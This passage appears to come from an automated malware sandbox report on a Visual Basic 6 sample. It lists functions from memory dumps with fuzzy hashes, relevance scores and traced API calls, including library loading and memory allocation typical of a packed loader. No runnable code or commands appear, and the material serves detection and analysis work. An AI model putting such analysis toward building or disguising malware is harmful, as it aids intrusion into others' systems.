Instruction Fuzzy Hash: 0451E236618385DFDB74CF24CD956EABBA1FF48340F05446EEC89AB215C7706A41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 022F247B, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1308afb6b2ebc801f29aa89aea42ac738ca2353eecc6588f3400e9c8a04e38c
Instruction ID: 2183d8a846faaa492afad3b630fad8fe12bc7ce62139bb9fa2f7cc64e6c471b2
Opcode Fuzzy Hash: c1308afb6b2ebc801f29aa89aea42ac738ca2353eecc6588f3400e9c8a04e38c
Instruction Fuzzy Hash: DB51F571A0434A9FDB748E68CD55BDA7BE6EF9C350F41812DEC8DDB214C7318A418B41

Uniqueness

Uniqueness Score: -1.00%

Function 022F9FFF, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf4dd5c52fa96fc7c7e9d6679ccc4e970f6da79814832d40d688443f3f77ee2e
Instruction ID: 55a7ae8b9deeb450c18f88625b3e1e090b5c9fbdf6f4ea739bbd9d319c2aaecf
Opcode Fuzzy Hash: bf4dd5c52fa96fc7c7e9d6679ccc4e970f6da79814832d40d688443f3f77ee2e
Instruction Fuzzy Hash: 3C51E9319593C58FCF758F388CA57D6FBA2AF52320F0A81AEC89A5F29AD3754005C711

Uniqueness

Uniqueness Score: -1.00%

Function 022F4D6E, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec2ee0a1334e4efd83fd23bb93fab1ad15a587f7b702cfccd03679843a4d321
Instruction ID: 9275113c0a5f5f08bac70c650e21fdd20e9f1c24ab3edab4985278e6b9110898
Opcode Fuzzy Hash: 1ec2ee0a1334e4efd83fd23bb93fab1ad15a587f7b702cfccd03679843a4d321
Instruction Fuzzy Hash: 50513172518786CFD770CF25C9947EABBE2AF49304F94412EC98E8FA09E331A651CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022F2A50, Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 540075f12d7619727448915cbb646b96f89396145555492cd7cea7f489e35288
Instruction ID: f34904832a677ecea8e8d8c60ddb1cc6c9d383bd160dda501cff4d33c7e1d23c
Opcode Fuzzy Hash: 540075f12d7619727448915cbb646b96f89396145555492cd7cea7f489e35288
Instruction Fuzzy Hash: 1E410672A1038ADBCF389E78CD987EF7B67AF99340F458229DD4A5B254D7304A41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022F2A45, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0b901d9886b0a8d08e762f7dfe5afbfd0d50bbfea3cbefa9a57527e16728da14
Instruction ID: 41ad91289072544071a0ad1c93d105588fcc1c2d0ace06e6fe9959d363df22a5
Opcode Fuzzy Hash: 0b901d9886b0a8d08e762f7dfe5afbfd0d50bbfea3cbefa9a57527e16728da14
Instruction Fuzzy Hash: E241E172A15389DFCF359F78CC997EABBA2AF9A300F46816ADC495B218D7304641CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022FA0AB, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc1a75ef6a63f093c7a382bf8cff66230f19ce529099e917349b456ce264eabf
Instruction ID: a5d4e57f96214db1f2f1ffd917965aa094493b1e81e0f559ca691c0d9939c382
Opcode Fuzzy Hash: fc1a75ef6a63f093c7a382bf8cff66230f19ce529099e917349b456ce264eabf
Instruction Fuzzy Hash: 6C4128326553898FDB359F348CA57D6FBA2BF92310F0A806EC85A5F28AD7705145CB11

Uniqueness

Uniqueness Score: -1.00%

Function 022F3415, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d355ca571fc246e608ce17f491b7ab1aca752f9cb9b29f9c54d0cba22ea6651a
Instruction ID: d8388ecc6d3b718fcb50925698a1b454ade9c739ea484288fe9ea1d5696b2126
Opcode Fuzzy Hash: d355ca571fc246e608ce17f491b7ab1aca752f9cb9b29f9c54d0cba22ea6651a
Instruction Fuzzy Hash: E7410335618384DFCB74CF75C9956EABBA1FF48340F05486DE98AAB225C3705A80CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0040784E, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4793e650aaaaaddd15a69b11f15817178076d7b5be93964a07b1fa75afa85e2a
Instruction ID: a4c11d62886b0d23f3865277699e6bd564fcade4985fe660f7a6d486aaa27876
Opcode Fuzzy Hash: 4793e650aaaaaddd15a69b11f15817178076d7b5be93964a07b1fa75afa85e2a
Instruction Fuzzy Hash: C13138354583908FD723CF38C0A86953FA0EF4722536948EAC0818F566D62AA856DB53

Uniqueness

Uniqueness Score: -1.00%

Function 022F3462, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a138c2ed67e2595898f6cdd547add26f023b6b74a324b6dbcc35a645cb57a13
Instruction ID: 8ac09aaa0d80547fca7495c5e5f18472913f7f7e9ba37a4c3183188f7b99ac46
Opcode Fuzzy Hash: 2a138c2ed67e2595898f6cdd547add26f023b6b74a324b6dbcc35a645cb57a13
Instruction Fuzzy Hash: 373129361183849FDBB0DF75CA94AEEBBA1FF44740F15481DD989EB225C3705A80CB12

Uniqueness

Uniqueness Score: -1.00%

Function 022FA311, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f2db1bc8ef780fc8fe77e03ff15e42f68b75e5c5243296cc45620a7974f18d
Instruction ID: 739f4bf5f16ab9cfc8ff41f78fa4a210399073a410592f159ee9237943b1d798
Opcode Fuzzy Hash: 90f2db1bc8ef780fc8fe77e03ff15e42f68b75e5c5243296cc45620a7974f18d
Instruction Fuzzy Hash: 17314534558386CFDB219F7889593EABFA1AF92354F0941BDCC994F26AC3340246C712

Uniqueness

Uniqueness Score: -1.00%

Function 022F4E71, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ce0afc3e76143805caa622e1950f56349fa088794c6e438e37519c23148d40
Instruction ID: de142e66ecb475c27175cc31d16594a2397e047a890679b83f7b545746e73f9e
Opcode Fuzzy Hash: 60ce0afc3e76143805caa622e1950f56349fa088794c6e438e37519c23148d40
Instruction Fuzzy Hash: EA313431A15786CFE774CE35C9653DA7BE1AF89304F84412ECA4D9FA08D331A651CB81

Uniqueness

Uniqueness Score: -1.00%

Function 022F8DDD, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d7e98e8133a2bcbf13867bb1ea35e6b83e197fcb10380ed8679150a28c7811
Instruction ID: fd8c62dd3c0f230144b771c9c30dd9a1d6ccd0fcfe116be68aef7e8ddef08fc9
Opcode Fuzzy Hash: 90d7e98e8133a2bcbf13867bb1ea35e6b83e197fcb10380ed8679150a28c7811
Instruction Fuzzy Hash: AC21EE3571438B8FCB60DE78C9D03DAB7A2BF96744F448229EE498B259E7704906C742

Uniqueness

Uniqueness Score: -1.00%

Function 022F4C08, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec3a99731c5703c05a102d48d12ba03804c66f0dc90e84e0159a04b7b4d3e98
Instruction ID: cf7e2ce2f400026cf06ed61442ab7fa25a6ba55697efda19c38cd3c764b7277d
Opcode Fuzzy Hash: fec3a99731c5703c05a102d48d12ba03804c66f0dc90e84e0159a04b7b4d3e98
Instruction Fuzzy Hash: FA316D301087C58BDF668FB88888B91BF91AF07314F0982EEC9994E6DBE7355149CB06

Uniqueness

Uniqueness Score: -1.00%

Function 022F84DB, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74414bcec94e89a8ab473e76ca73138cd2a54a355e59c124e72096053a962cb
Instruction ID: 0332acacb2fb5511759b79cb97cfc8a8fc434e446c9866fd91102b6763c8f4de
Opcode Fuzzy Hash: b74414bcec94e89a8ab473e76ca73138cd2a54a355e59c124e72096053a962cb
Instruction Fuzzy Hash: 5E315031919684CFDB168F35C89A296BFB0FF93309B1A50DEC8855F62AF7316015CB82

Uniqueness

Uniqueness Score: -1.00%

Function 022F9049, Relevance: .1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,022F9264,08D287BE,598BEE16,022F02E3,-0000000226638B60,022F7ABF,00000000,022F027E), ref: 022F8B03

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a94ed542a4e6b483c4b6f322ab7accf6d012252477d789dcfb87ca2b309b799e
Instruction ID: 11ad32e6dc1ec91c921e48e2fec70cb4e67fa403a80861aba9a933a6042f2bb1
Opcode Fuzzy Hash: a94ed542a4e6b483c4b6f322ab7accf6d012252477d789dcfb87ca2b309b799e
Instruction Fuzzy Hash: 6B215B729153818FEB654F708C5A3E6FFB3AF91340F16807DC9865BA29E7315185C741

Uniqueness

Uniqueness Score: -1.00%

Function 022F34DA, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 054dd9a02694703413338f2dcf07fdf3ff053a75ee8eedead3731c37a96748a2
Instruction ID: 1255fc0a83a45081ee2ee3169bfc5da86753e42e2ba7a28ae299d85e126e6e14
Opcode Fuzzy Hash: 054dd9a02694703413338f2dcf07fdf3ff053a75ee8eedead3731c37a96748a2
Instruction Fuzzy Hash: F8213736518380DFD7609F31CA8569EBBA1FF14780F06085CD9CAEB625D7706A80CB03

Uniqueness

Uniqueness Score: -1.00%

Function 022F9AA6, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb6a19d485d2f376ce4f4a464d06ff11789f3769116286ac827ea248995caf4
Instruction ID: 80b3695e13d23d421dd9abe74fbe093a40a74dfb8a98cb1bae663edf2c16cae6
Opcode Fuzzy Hash: cdb6a19d485d2f376ce4f4a464d06ff11789f3769116286ac827ea248995caf4
Instruction Fuzzy Hash: 6011E3B2904295CFDBB0DEB889A97EA77A5AF19340F01012E9D4AEB214D7309F458B41

Uniqueness

Uniqueness Score: -1.00%

Function 022F8F0C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e467b6cfab6ccd1ce2d3ad3d883c71a44a9fa2339eb255ae104a20a6344b49d7
Instruction ID: 9bde04afc92938d593bc0dab111771c1868bd68200a9a4c4c0c02dba06049e6e
Opcode Fuzzy Hash: e467b6cfab6ccd1ce2d3ad3d883c71a44a9fa2339eb255ae104a20a6344b49d7
Instruction Fuzzy Hash: 79010875224688CFCB78DF15C995AEEB3B2EB55350F524129EE098B329C730AA04CB16

Uniqueness

Uniqueness Score: -1.00%

Function 022F89A8, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00411095, Relevance: 37.7, APIs: 25, Instructions: 246COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 004110B2
__vbaAryConstruct2.MSVBVM60(?,004029F4,00000002,?,?,?,?,00401236), ref: 004110CF
#610.MSVBVM60(?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110D8
#557.MSVBVM60(?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110E1
__vbaFreeVar.MSVBVM60(?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110F8
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411119
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411140
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411167
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 0041118E
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004111B5
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004111DF
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 0041120C
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411239
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411266
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411293
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004112C0
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4), ref: 004112EA
__vbaHresultCheckObj.MSVBVM60(00000000,0000000B,0040292C,00000014), ref: 00411337
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,000000B8), ref: 0041137E
__vbaFreeObj.MSVBVM60(00000000,?,00402950,000000B8), ref: 0041139D
__vbaNew2.MSVBVM60(0040293C,00413418), ref: 004113B5
__vbaHresultCheckObj.MSVBVM60(00000000,0000000B,0040292C,00000048), ref: 00411404
__vbaStrMove.MSVBVM60(00000000,0000000B,0040292C,00000048), ref: 00411428
__vbaFreeStr.MSVBVM60(00411467,?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 00411450
__vbaAryDestruct.MSVBVM60(00000000,?,00411467,?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 00411461

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$CheckFreeHresult$New2$#557#610ChkstkConstruct2DestructMove
String ID:
API String ID: 2040534524-0
Opcode ID: a76b7f3ee1b212ad672dac9041d3fdd7de6b1e558f20a34687fc7efd238bffd6
Instruction ID: 6d04e2fae51a1a39a77b55eeb4be8abc18a85861e2ba32858722686cf3167da9
Opcode Fuzzy Hash: a76b7f3ee1b212ad672dac9041d3fdd7de6b1e558f20a34687fc7efd238bffd6
Instruction Fuzzy Hash: 8EC1C274D00258DFEB10DFD4C985BEDBBB0BF09319F2040AAE505BA6A5D7781989CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00410008, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410024
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 00410050
#712.MSVBVM60(000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 00410065
__vbaStrMove.MSVBVM60(000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 0041006F
__vbaStrCmp.MSVBVM60(0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 0041007C
#539.MSVBVM60(000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 0041008F
__vbaStrVarMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 00410098
__vbaStrMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100A2
__vbaFreeVar.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100AA
#539.MSVBVM60(000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF), ref: 004100B9
__vbaStrVarMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100C2
__vbaStrMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100CC
__vbaFreeVar.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100D4
__vbaEnd.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100D9
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100FF
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 00410107
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 0041010F

Strings

val, xrefs: 00410048

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#539$#712ChkstkCopy
String ID: val
API String ID: 649389897-2548021861
Opcode ID: 17fac777e76b7fa26b15d37a7fd52e64fda92e63abeecefce0e157de18b6b271
Instruction ID: 5a64d03993b878f9ca2d9e60cd278fef3822f2b1fe61ea68fd5e2a6c53f6f2bc
Opcode Fuzzy Hash: 17fac777e76b7fa26b15d37a7fd52e64fda92e63abeecefce0e157de18b6b271
Instruction Fuzzy Hash: 62212E31A40208AAEB10FBA1CC86FDE7B78AF04714F50403AF501B69E1DBBD59858B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE4C, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FE68
__vbaInStrB.MSVBVM60(00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FE9A
__vbaNew2.MSVBVM60(0040293C,00413418,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FEBB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 0040FEFF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF40
__vbaStrMove.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF5E
__vbaFreeObj.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF66
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF85
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF8F
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF97
#531.MSVBVM60(diktaturs,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FFA1
__vbaFreeStr.MSVBVM60(0040FFE1,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FFD3
__vbaFreeStr.MSVBVM60(0040FFE1,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FFDB

Strings

ABC, xrefs: 0040FE8E
diktaturs, xrefs: 0040FF9C

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#531#702ChkstkNew2
String ID: ABC$diktaturs
API String ID: 1156614088-2872196872
Opcode ID: 15b364c55b9f81ee2d8ff2b7d81445ec119a720e8ce0c2a6d7327ac9bcbbe917
Instruction ID: 387b7d44bbb873d3f1eeb646bcec43e3c9abf43532bfd009b38f020aa540208c
Opcode Fuzzy Hash: 15b364c55b9f81ee2d8ff2b7d81445ec119a720e8ce0c2a6d7327ac9bcbbe917
Instruction Fuzzy Hash: 5D410570900209AFDB10EFE5C949BDDBBB4BB08714F20813AE511BB6E1D7B85949CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041147A, Relevance: 24.1, APIs: 16, Instructions: 139COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00411495
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 004114AD
#678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004114F3
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004114F8
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00411508
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00411535
#704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00411560
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041156A
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00411572
__vbaNew2.MSVBVM60(0040293C,00413418,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041158A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,0000004C), ref: 004115D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 00411614
__vbaFreeObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 0041162B
#570.MSVBVM60(000000A9), ref: 00411635
__vbaFreeStr.MSVBVM60(00411671), ref: 00411663
__vbaFreeStr.MSVBVM60(00411671), ref: 0041166B

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#570#678#704ChkstkCopyListMoveNew2
String ID:
API String ID: 2851493834-0
Opcode ID: 2d08c8c4d0cfd305d50e99d2877eb7c6803897c61ad51bf62ce493348d0bcbd8
Instruction ID: 853be40f8af49f836c18458788eed5fd231296939b6e5f1900c4ab223217335a
Opcode Fuzzy Hash: 2d08c8c4d0cfd305d50e99d2877eb7c6803897c61ad51bf62ce493348d0bcbd8
Instruction Fuzzy Hash: 1D510870910218EBDB10EF91CD85BEEBBB9FB08714F20426EF105B71A1DB785944DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00410E07, Relevance: 21.2, APIs: 14, Instructions: 155COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410E25
__vbaVarDup.MSVBVM60 ref: 00410E5D
#528.MSVBVM60(?,?), ref: 00410E6A
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00410E85
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00410E98
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00401236), ref: 00410EBF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 00410F0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000108), ref: 00410F5C
__vbaFreeObj.MSVBVM60(00000000,?,00402950,00000108), ref: 00410F7B
__vbaNew2.MSVBVM60(0040293C,00413418), ref: 00410F93
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,0000004C), ref: 00410FE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 00411026
__vbaFreeObj.MSVBVM60(00000000,?,004029E0,00000028), ref: 0041103D
#570.MSVBVM60(000000A9), ref: 00411047

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#528#570ChkstkList
String ID:
API String ID: 4267626096-0
Opcode ID: 904501d4d831e44ef3c65b95543ba94fd84c7a574697dde80e5012a2fa522249
Instruction ID: 348fd8ffbcb1d8a91596785cfddb04ef991d0eb3d3694d2b02d35694fb9491c2
Opcode Fuzzy Hash: 904501d4d831e44ef3c65b95543ba94fd84c7a574697dde80e5012a2fa522249
Instruction Fuzzy Hash: CC61E474D00228EFEB21DFA4C845BDDBBB4BF08304F1040AAE505B72A2D7B85985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBE5, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FC02
#696.MSVBVM60(004028FC,?,?,?,?,00401236), ref: 0040FC19
#539.MSVBVM60(?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC32
